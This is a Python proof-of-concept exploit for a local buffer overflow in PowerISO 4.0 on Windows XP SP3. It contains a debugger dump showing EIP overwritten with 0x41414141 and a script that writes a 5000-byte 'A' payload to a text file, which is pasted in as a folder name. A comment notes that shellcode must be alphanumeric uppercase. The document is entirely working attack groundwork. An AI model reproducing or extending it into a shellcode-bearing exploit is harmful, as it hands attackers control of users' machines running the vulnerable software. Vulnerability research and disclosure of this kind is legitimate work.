#!/usr/bin/env python

####################################################################################
#
# Poweriso 4.0 Local Buffer Overflow PoC
# Found By:	Dr_IDE
# Tested On:	XPSP3
# Usage:	Create New ISO, Add a New Folder, Paste to Rename Folder, Click Save
# Notes:	This must have been fixed somewhere between 4.0 and 4.7
#
####################################################################################

'''
EAX 00ADDDC0
ECX 00000000
EDX 00004000
EBX 00000000
ESP 0211FA6C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA~0"
EBP 00000000
ESI 0211FA20
EDI 00ADC2F0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EIP 41414141
C 0  ES 0023 32bit 0(FFFFFFFF)
P 0  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFD5000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty +UNORM 3C0A 0012EBE8 00000000
ST1 empty -UNORM F674 00000000 0000000C
ST2 empty 3.3165366670546675450e-4932
ST3 empty 0.0000000000019151440e-4933
ST4 empty 3.3165367202851109490e-4932
ST5 empty +UNORM 0001 0012F674 00000000
ST6 empty +UNORM 000C 000B0418 7E418734
ST7 empty -UNORM ABCD 7E43E577 0012F674
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
'''

# Shellcode must be Alpha Upper

buff = ("\x41" * 5000)

f1 = open("poweriso.txt","w")
f1.write(buff)
f1.close()